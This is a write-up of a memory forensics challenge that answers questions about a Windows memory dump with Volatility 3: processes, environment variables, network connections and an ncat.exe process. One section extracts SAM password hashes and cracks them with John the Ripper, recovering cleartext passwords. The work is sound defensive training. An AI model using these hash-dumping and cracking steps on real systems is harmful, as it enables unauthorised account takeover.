Logged in users must use session 1 and higher. This confirms earlier, there was only one user logged in, hence once session.

Looking at the environment variables

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.envars.Envars > envars.txt

Q: Where does the "ComSpec" environment variable point to?
A: ComSpec points to: "C:\Windows\system32\cmd.exe"

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp 'ComSpec.*' envars.txt --only-matching | sort --unique
ComSpec C:\Windows\system32\cmd.exe

Q: What is/are the "USERNAME" defined?
A: The usernames defined are:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp 'USERNAME.*' envars.txt --only-matching | sort --unique
USERNAME        LOCAL SERVICE
USERNAME        securitynik
USERNAME        SECURITYNIK-WIN$
USERNAME        SYSTEM

Q: What is/are the "OS" information?
A: OS is reported as:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp 'OS.*' envars.txt --only-matching | sort --unique
OS      Windows_NT

Q: What is/are the "COMPUTERNAME" name(s) identified?
A: Computer name is:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp 'COMPUTERNAME.*' envars.txt --only-matching | sort --unique
COMPUTERNAME    SECURITYNIK-WIN

One of the first things any good hacker does once access is gained, is to obtain (dump) credentials. Once again red team stuff:-) We are here from the defenders' perspective but still can get credentials.

If you answered the question above about the user(s) logged in at the time of the memory dump, then this question may or may not make more sense. 

Q: How many user(s) are listed in the Security Accounts Manager (SAM) on this host?
A: There are 6 users reported in the SAM

Q: What is/are the user(s) RID, username, LM Hash and NT Hash?
A: There RID, Username, LM and NT hashes are
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
User    rid     lmhash  nthash

Administrator   	500     aad3b435b51404eeaad3b435b51404ee        23e1d10001876b0078a9a779017fc026
Guest   		501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount  	503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount      504     aad3b435b51404eeaad3b435b51404ee        33651ad684b9bfb2e11f422d80b16ceb
securitynik     	1001    aad3b435b51404eeaad3b435b51404ee        23e1d10001876b0078a9a779017fc026
nakia   		1003    aad3b435b51404eeaad3b435b51404ee        f1c216dcadb73b5960bbcdf03bf3bbe0

Q: What is/are the cleartext passwords?

If you found the hashes above, you should be able to crack the passwords. 

There are a number of ways to solve this problem. We can redirect the output to a file and modify the file by replacing the spaces with a colon. This allows us to feed the new file into John the Ripper. 

First, add the hashdump plugin output to a file.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.hashdump.Hashdump > hashdump.txt

Clean up the file by replacing the spaces (" ") with a colon (":") Below shows the cleaned up file. At the same time, delete lines 1 to 4 at the beginning of the file.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat hashdump.txt | sed -e "s/\s/:/g;1,4d"
Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:33651ad684b9bfb2e11f422d80b16ceb
securitynik:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026
nakia:1003:aad3b435b51404eeaad3b435b51404ee:f1c216dcadb73b5960bbcdf03bf3bbe0


┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat hashdump.txt | sed -e "s/\s/:/g;1,4d" > new_hashdump.txt

Above, I used sed to replace the spaces with ":" while at the same time, using sed to delete the first 4 lines. This makes the file cleaner for tools such as hashcat and john.

Using John we see the passwords are:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ john --format=nt new john --format=nt new_hashdump.txt
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
                 (Guest)
                 (DefaultAccount)
Testing1         (Administrator)
Testing1         (securitynik)
Proceeding with incremental:ASCII
4g 0:00:06:42  3/3 0.009944g/s 34234Kp/s 34234Kc/s 68468KC/s ccr2brim..ccr2br04
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session aborted

Alternatively, I could have just format the passwords by extracting the NTLM hashes and providing them to https://crackstation.net/

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat new_hashdump.txt | awk --field-separator=':' '{ print $4 }'
23e1d10001876b0078a9a779017fc026
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
33651ad684b9bfb2e11f422d80b16ceb
23e1d10001876b0078a9a779017fc026
f1c216dcadb73b5960bbcdf03bf3bbe0

These hashes can then be passed to crack station. see below:













Here we see the results of the cracked passwords:





















These can also further be confirmed via:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ john --show --format=nt new_hashdump.txt
Administrator:Testing1:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
securitynik:Testing1:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026

Q: What are the passwords for all users?
A: Guest and Default Account seems to have blank passwords, while Administrator and SecurityNik have password of Testing1

                 (Guest)
                 (DefaultAccount)
Testing1         (Administrator)
Testing1         (securitynik)

I was unable to determine the password for the user "Nakia"

With Creds out of the way, let's move on.

Let's start this process (pun intended :-D ) off by looking at the processes.

I start this off by writing the pslist information to a file and to the screen.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist.PsList > pslist.txt
Progress:  100.00               PDB scanning finished

Confirm the file was created: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls pslist.txt
pslist.txt

With this in place, time for some questions.

Q: How many unique processes (based on names) have one (1) occurrence?
A: There are 49 processes with 1 occurrence:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | grep --perl-regexp '\s+?1\s+' | wc --lines
49

Q: How many unique processes, based on names were seen at the time of this memory capture?
A: There were 68 unique processes based on their names:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines
68

Q: How many active processes were running on the system, when this capture was taken.
A: 220. - If you look at just the lines returned you will get 224. However, we need to remove headers and spaces from above. This produces 220.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | wc --lines
224

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | sed '1,4d' | wc --lines
220

Q: What are the top 10 processes based on occurrences/count? 
A: Here are the top 10 processes:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=10
     78 svchost.exe
     15 MoNotification
     12 cmd.exe
     12 chrome.exe
      9 conhost.exe
      8 msedge.exe
      6 RuntimeBroker.
      6 powershell.exe
      4 OpenConsole.ex
      3 dllhost.exe

Q: What is the process with the most occurrence/count?
A: The process most seen was svchost.exe with 78 counts

Q: For the process that is seen the most, what is the "CreateTime" of the first and last instances seen of this process?
A: Answer here:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | sed '1,4d;$d'  | grep 'svchost.exe'  | sed '2,77d'
884     696     svchost.exe     0xe78bf2c90080  19      -       0       False   2023-11-16 19:09:13.000000      N/A     Disabled
2220    696     svchost.exe     0xe78bf70870c0  5       -       0       False   2023-11-16 23:56:45.000000      N/A     Disabled

Q: How many unique process names were seen active (not exited) at the time of this memory capture?
A: 66
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt  | grep "N/A" | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines
66

Q: How many unique processes that have exited, based on their Process ID (PID)
A: Based on PID, there were 23 unique processes, based on PID that have exited.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt  | grep "N/A" --invert-match
Volatility 3 Framework 2.5.2

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

5556    696     svchost.exe     0xe78bf33a80c0  0       -       0       False   2023-11-16 19:12:58.000000      2023-11-16 19:13:04.000000      Disabled
2992    1548    powershell.exe  0xe78bf3d6e0c0  0       -       0       False   2023-11-16 19:18:05.000000      2023-11-16 19:18:06.000000      Disabled
2252    2992    powershell.exe  0xe78bf435f0c0  0       -       0       False   2023-11-16 19:18:06.000000      2023-11-16 22:01:47.000000      Disabled
5708    1280    TabTip.exe      0xe78bf42321c0  0       -       1       False   2023-11-16 19:24:25.000000      2023-11-16 19:25:14.000000      Disabled
3040    768     userinit.exe    0xe78bf517f080  0       -       1       False   2023-11-16 19:24:46.000000      2023-11-16 19:25:17.000000      Disabled
7040    1100    msedge.exe      0xe78bf4e300c0  0       -       1       False   2023-11-16 19:25:26.000000      2023-11-16 21:19:45.000000      Disabled
484     4776    MoNotification  0xe78bf46ef080  0       -       1       False   2023-11-16 19:30:34.000000      2023-11-16 19:54:19.000000      Disabled
1012    4776    MoNotification  0xe78bf51750c0  0       -       1       False   2023-11-16 19:54:18.000000      2023-11-16 19:54:19.000000      Disabled
3148    4776    MoNotification  0xe78bf428c0c0  0       -       1       False   2023-11-16 19:54:19.000000      2023-11-16 19:54:37.000000      Disabled
2816    4776    MoNotification  0xe78bf4fc30c0  0       -       1       False   2023-11-16 19:54:37.000000      2023-11-16 20:26:01.000000      Disabled
4908    4776    MoNotification  0xe78bf4ec9080  0       -       1       False   2023-11-16 20:26:00.000000      2023-11-16 20:26:01.000000      Disabled
6168    4776    MoNotification  0xe78bf32c4080  0       -       1       False   2023-11-16 20:26:01.000000      2023-11-16 20:27:32.000000      Disabled
5348    4776    MoNotification  0xe78bf4ebe080  0       -       1       False   2023-11-16 20:27:32.000000      2023-11-16 21:34:07.000000      Disabled
8848    4776    MoNotification  0xe78bf689b0c0  0       -       1       False   2023-11-16 21:34:06.000000      2023-11-16 21:34:07.000000      Disabled
7200    4776    MoNotification  0xe78bf62da0c0  0       -       1       False   2023-11-16 21:34:07.000000      2023-11-16 21:35:30.000000      Disabled
4116    4776    MoNotification  0xe78bf61950c0  0       -       1       False   2023-11-16 21:35:30.000000      2023-11-16 22:55:10.000000      Disabled
488     4000    VMwareResoluti  0xe78bf2b65080  0       -       1       False   2023-11-16 21:37:30.000000      2023-11-16 21:37:31.000000      Disabled
5176    7164    cmd.exe 0xe78bf52e9080  0       -       1       False   2023-11-16 22:03:58.000000      2023-11-16 22:06:04.000000      Disabled
4120    5508    powershell.exe  0xe78bf6961080  0       -       0       False   2023-11-16 22:08:06.000000      2023-11-16 22:08:31.000000      Disabled
2860    4776    MoNotification  0xe78bf671b0c0  0       -       1       False   2023-11-16 22:55:10.000000      2023-11-16 22:55:10.000000      Disabled
5424    4776    MoNotification  0xe78bf62ec0c0  0       -       1       False   2023-11-16 22:55:10.000000      2023-11-16 22:56:41.000000      Disabled
6764    4776    MoNotification  0xe78bf8e9c080  0       -       1       False   2023-11-16 22:56:41.000000      2023-11-16 23:56:45.000000      Disabled
2752    4776    MoNotification  0xe78bf67170c0  0       -       1       False   2023-11-16 23:56:44.000000      2023-11-16 23:56:45.000000      Disabled


Q: How many unique processes by names that have exited?
A: Based on unique process names, there were 8 unique process names for processes which have exited.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt  | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique | wc --lines
8

These are the unique processes.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt  | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique
cmd.exe
MoNotification
msedge.exe
powershell.exe
svchost.exe
TabTip.exe
userinit.exe
VMwareResoluti

Q: What Endpoint Detection and Response (EDR) Mechanism  was installed on this system at the time of taking this memory capture?
A: Microsoft Defender
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep --ignore-case "MSMp"
4032    696     MsMpEng.exe     0xe78bf38b5080  14      -       0       False   2023-11-16 19:09:46.000000      N/A     Disabled

From a different perspective:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ssh_logs/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.joblinks.JobLinks> job_links.txt
Progress:  100.00               PDB scanning finished

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat job_links.txt | head --lines=6
Volatility 3 Framework 2.5.2

Offset(V)       Name    PID     PPID    Sess    JobSess Wow64   Total   Active  Term    JobLink Process

0xe78bf38b5080  MsMpEng.exe     4032    696     0       0       False   25      1       0       N/A     (Original Process)
* 0xe78bf38b5080        MsMpEng.exe     4032    696     0       0       False   0       0       0       Yes     C:\Program Files\Windows Defender\MsMpEng.exe


Q: What Database server is running on the system?
A: MySQL. This is determined from mysqld.exe.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep --ignore-case "mysql"
9044    8100    mysqld.exe      0xe78bf4fa5080  30      -       1       False   2023-11-16 23:26:13.000000      N/A     Disabled

Q: What Webserver server is running on the system?
A: httpd. Apache! https://httpd.apache.org/download.cgi
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep http
10008   8100    httpd.exe       0xe78bf6fb6080  1       -       1       False   2023-11-16 23:26:15.000000      N/A     Disabled
5088    10008   httpd.exe       0xe78bf61b9080  156     -       1       False   2023-11-16 23:26:16.000000      N/A     Disabled

Even more process information:
At first, we looked at standalone processes now let's transition this to seeing the relationship across the processes.

With a solid understanding of identifying process, let's look at least one more place.

First get the process tree information into a file:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.txt
Progress:  100.00               PDB scanning finished

Q: Which process has the most handles opened? What is the process name and process id?
A: The process is httpd.exe but there are two. However, the one with PID 5088 is what we need:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep http
**** 10008      8100    httpd.exe       0xe78bf6fb6080  1       -       1       False   2023-11-16 23:26:15.000000      N/A
***** 5088      10008   httpd.exe       0xe78bf61b9080  156     -       1       False   2023-11-16 23:26:16.000000      N/A

Update: After revisiting this, it seems my grep on http was incorrect. This caught the 156 threads column not the handles. I changed my technique and instead decided to put this into a CSV file.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --renderer csv  --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.csv

This CSV gives a better opportunity to sort the fields.  Now when I sort the fields, it seems the handles information is empty here.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.csv | awk --field-separator=',' '{ print $7 }' | sort | uniq

-
Handles

Now we can see no handles are being reported here. Let's now try to do the same thing for the pslist plugin to see if we get some data we can work with.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --renderer csv  --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist | cut -f 7 -d ',' | sort | uniq                                                           
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished                                
-
Handles

Epic failure! :-) My initial answer was 156 this is obviously wrong! Why did I not just update the blog to reflect the new material and remove the incorrect answer? Great question! One of the problems with forensics is that we need to ensure we are validating our tools and techniques. This is why we should not rely on any one tool or technique but always try other ways or have our work peer reviewed. I am leaving my mistake above, so you can see my errors as I am human just like you :-) If you see any other errors, do let me know.


Q: Starting at a count of 2 (**), which process has the largest count of children?
A: The process with the most children is svchost.exe with process id 884

The process in the previous section spawned 22 children.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+' | wc --lines
23

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+'
** 884  696     svchost.exe     0xe78bf2c90080  19      -       0       False   2023-11-16 19:09:13.000000      N/A
*** 9736        884     backgroundTask  0xe78bf61b4080  7       -       1       False   2023-11-16 23:26:04.000000      N/A
*** 2576        884     TextInputHost.  0xe78bf33c1080  21      -       1       False   2023-11-16 19:25:22.000000      N/A
*** 6804        884     RuntimeBroker.  0xe78bf4e2d080  9       -       1       False   2023-11-16 19:25:24.000000      N/A
*** 7956        884     RuntimeBroker.  0xe78bf4e1e080  2       -       1       False   2023-11-16 19:57:25.000000      N/A
*** 3224        884     dllhost.exe     0xe78bf49c2080  7       -       1       False   2023-11-16 19:25:02.000000      N/A
*** 2168        884     WidgetService.  0xe78bf48c50c0  5       -       1       False   2023-11-16 19:30:23.000000      N/A
*** 2592        884     Microsoft.Phot  0xe78bf42bf0c0  15      -       1       False   2023-11-16 19:43:56.000000      N/A
*** 10152       884     smartscreen.ex  0xe78bf707a080  6       -       1       False   2023-11-16 23:56:53.000000      N/A
*** 820 884     ApplicationFra  0xe78bf52680c0  3       -       1       False   2023-11-16 19:30:26.000000      N/A
*** 6204        884     ShellExperienc  0xe78bf33c4080  31      -       1       False   2023-11-16 19:25:21.000000      N/A
*** 2748        884     RuntimeBroker.  0xe78bf4521080  7       -       1       False   2023-11-16 19:24:56.000000      N/A
*** 4944        884     WmiPrvSE.exe    0xe78bf3b95080  9       -       0       False   2023-11-16 19:09:59.000000      N/A
*** 8784        884     RuntimeBroker.  0xe78bf5cc3080  6       -       1       False   2023-11-16 23:56:45.000000      N/A
*** 5080        884     RuntimeBroker.  0xe78bf59c20c0  3       -       1       False   2023-11-16 19:43:59.000000      N/A
*** 3808        884     StartMenuExper  0xe78bf44cf080  16      -       1       False   2023-11-16 19:24:56.000000      N/A
*** 1376        884     RuntimeBroker.  0xe78bf49ac080  5       -       1       False   2023-11-16 19:24:57.000000      N/A
*** 1888        884     UserOOBEBroker  0xe78bf523b080  1       -       1       False   2023-11-16 19:30:30.000000      N/A
*** 1256        884     dllhost.exe     0xe78bf5ef3080  2       -       1       False   2023-11-16 22:50:53.000000      N/A
*** 1260        884     SearchHost.exe  0xe78bf44cc080  76      -       1       False   2023-11-16 19:24:56.000000      N/A
*** 1392        884     Widgets.exe     0xe78bf48e8080  5       -       1       False   2023-11-16 19:24:56.000000      N/A
*** 3448        884     SystemSettings  0xe78bf52350c0  20      -       1       False   2023-11-16 19:30:26.000000      N/A
*** 10108       884     backgroundTask  0xe78bf6ed10c0  8       -       1       False   2023-11-16 23:56:44.000000      N/A

Q: Once again, starting at a count of 2 (**), which process has the largest count of grandchildren?
A: The process with the largest number of grandchildren is cmd.exe with PID 2796 which was spawned by powershell.exe with PID 644.
This process has 11 grandchildren.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+4668\s+|\s+2796\s+'
***** 2796      644     cmd.exe 0xe78bf68ce0c0  1       -       1       False   2023-11-16 21:29:22.000000      N/A
****** 4668     2796    chrome.exe      0xe78bf69ac0c0  43      -       1       False   2023-11-16 21:29:25.000000      N/A
******* 9152    4668    chrome.exe      0xe78bf65570c0  15      -       1       False   2023-11-16 21:29:25.000000      N/A
******* 6944    4668    chrome.exe      0xe78bf68a8080  15      -       1       False   2023-11-16 21:29:46.000000      N/A
******* 2392    4668    chrome.exe      0xe78bf658a0c0  18      -       1       False   2023-11-16 21:30:06.000000      N/A
******* 5188    4668    chrome.exe      0xe78bf6192080  15      -       1       False   2023-11-16 21:29:27.000000      N/A
******* 7364    4668    chrome.exe      0xe78bf4f60080  9       -       1       False   2023-11-16 21:29:40.000000      N/A
******* 904     4668    chrome.exe      0xe78c05e3d080  15      -       1       False   2023-11-16 21:29:49.000000      N/A
******* 7980    4668    chrome.exe      0xe78bf8e9b0c0  7       -       1       False   2023-11-16 21:29:25.000000      N/A
******* 1356    4668    chrome.exe      0xe78bf69ce0c0  10      -       1       False   2023-11-16 21:29:25.000000      N/A
******* 8628    4668    chrome.exe      0xe78bf69680c0  17      -       1       False   2023-11-16 21:30:11.000000      N/A
******* 8696    4668    chrome.exe      0xe78bf5337080  15      -       1       False   2023-11-16 21:29:31.000000      N/A
******* 9180    4668    chrome.exe      0xe78bf3b440c0  16      -       1       False   2023-11-16 21:29:25.000000      N/A

Looking at another svchost.exe, this time with PID 1652, we see it spawned a child in ncat.exe

Q: Which process spawned ncat.exe?
A: "svchost.exe" with PID 1652
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep ncat --before-context=2
** 1652 696     svchost.exe     0xe78bf2fb1080  11      -       0       False   2023-11-16 19:09:18.000000      N/A
*** 1432        1652    taskhostw.exe   0xe78bf42a4080  8       -       1       False   2023-11-16 19:24:45.000000      N/A
*** 896 1652    ncat.exe        0xe78bf61d5080  1       -       1       True    2023-11-16 22:49:12.000000      N/A

One final piece of process information. There are times when there are remnants of processes in memory.

First up and as always, I write the information out to a file for easier and quicker processing.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.psscan.PsScan > psscan.txt
Progress:  100.00               PDB scanning finished

Do we have more processes being reported via PsScan than we saw in PsList?

Q: How many processes are reported in memory overall?
A: There are 219 processes in memory overall:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat psscan.txt | sed '1,4d' | wc --lines
219

I found it strange that this reported 219 when the psList report 220. Maybe I cut out an extra line. Always something that can be revisited.

Anyhow, moving on.

With this process information gathered, time to look at network information.

Write this information to a file:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netstat.NetStat > netstat.txt
Volatility was unable to read a requested page:nished
Page error 0x1800000028 in layer layer_name (Page Fault at entry 0x0 in table page directory)

Q: How many network connections were either in a LISTENING, ESTABLISHED OR CLOSED state at the time of this capture?
A: 50 connections
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | wc --lines
50

Q: Of those network connections found, how many were in LISTENING state?
A: 44
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN | wc --lines
44

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN
0xe78bf2daa340  TCPv4   0.0.0.0 22      0.0.0.0 0       LISTENING       3972    sshd.exe        2023-11-16 19:09:58.000000
0xe78bf2daa340  TCPv6   ::      22      ::      0       LISTENING       3972    sshd.exe        2023-11-16 19:09:58.000000
0xe78bf2daa4a0  TCPv4   0.0.0.0 22      0.0.0.0 0       LISTENING       3972    sshd.exe        2023-11-16 19:09:58.000000
0xe78bf3af4740  TCPv4   0.0.0.0 80      0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af4740  TCPv6   ::      80      ::      0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5920  TCPv4   0.0.0.0 80      0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf274b4f0  TCPv4   0.0.0.0 135     0.0.0.0 0       LISTENING       412     svchost.exe     2023-11-16 19:09:15.000000
0xe78bf274b4f0  TCPv6   ::      135     ::      0       LISTENING       412     svchost.exe     2023-11-16 19:09:15.000000
0xe78bf00fd0d0  TCPv4   0.0.0.0 135     0.0.0.0 0       LISTENING       412     svchost.exe     2023-11-16 19:09:15.000000
0xe78bf274a470  TCPv4   10.0.0.108      139     0.0.0.0 0       LISTENING       4       System  2023-11-16 19:09:08.000000
0xe78bf3af5ea0  TCPv4   0.0.0.0 443     0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5ea0  TCPv6   ::      443     ::      0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5be0  TCPv4   0.0.0.0 3306    0.0.0.0 0       LISTENING       9044    mysqld.exe      2023-11-16 23:26:13.000000
0xe78bf3af5be0  TCPv6   ::      3306    ::      0       LISTENING       9044    mysqld.exe      2023-11-16 23:26:13.000000
...

Q: Of those network connections found, how many were in "ESTABLISHED" state? 
I am disappointed that we do not see the process id and name for these "ESTABLISHED" connections. We can see the PID and name for the "LISTENING" sockets, so ...
A: 4
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST | wc --lines
4

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST
0xe78bf48cd010  TCPv4   10.0.0.108      4444    10.0.0.110      38159   ESTABLISHED     -       -       -
0xe78bf533dac0  TCPv4   10.0.0.108      49957   10.0.0.110      443     ESTABLISHED     -       -       N/A
0xe78bf4f0daa0  TCPv4   10.0.0.108      49685   10.0.0.101      4444    ESTABLISHED     -       -       N/A
0xe78bf3ea6ae0  TCPv4   10.0.0.108      49686   10.0.0.110      22      ESTABLISHED     -       -       N/A

Q: Of those network connections found, how many were in CLOSED state?
A: There are 2 sessions in the CLOSED states
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep CLOSED
0xe78bf69bbb00  TCPv4   127.0.0.1       9999    127.0.0.1       50369   CLOSED  -       -       N/A
0xe78bf33adaa0  TCPv4   127.0.0.1       9999    127.0.0.1       50366   CLOSED  -       -       N/A

At this point, we should be able to build our network map of the connections. Let us do that!





With the insights from network statistics, let's look to see if there are any remnants of connections in memory.

As always, writing the information to a file for further analysis.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netscan.NetScan > netscan.txt
Progress:  100.00               PDB scanning finished

Looking into memory we see additional connection.
Comparing the ESTABLISHED sessions ports with outputs from netscan.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | grep EST
0xe78bf48cd010  TCPv4   10.0.0.108      4444    10.0.0.110      38159   ESTABLISHED     -       -       -
0xe78bf533dac0  TCPv4   10.0.0.108      49957   10.0.0.110      443     ESTABLISHED     -       -       N/A
0xe78bf4f0daa0  TCPv4   10.0.0.108      49685   10.0.0.101      4444    ESTABLISHED     -       -       N/A
0xe78bf3ea6ae0  TCPv4   10.0.0.108      49686   10.0.0.110      22      ESTABLISHED     -       -       N/A

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netscan.txt | grep --perl-regexp '\s+4444\s+|\s+443\s+|\s+22\s+'
0xe78bf2daa340  TCPv4   0.0.0.0 22      0.0.0.0 0       LISTENING       3972    sshd.exe        2023-11-16 19:09:58.000000
0xe78bf2daa340  TCPv6   ::      22      ::      0       LISTENING       3972    sshd.exe        2023-11-16 19:09:58.000000
0xe78bf2daa4a0  TCPv4   0.0.0.0 22      0.0.0.0 0       LISTENING       3972    sshd.exe        2023-11-16 19:09:58.000000
0xe78bf2daa600  TCPv6   ::1     9999    ::      0       LISTENING       4444    ssh.exe 2023-11-16 21:15:54.000000
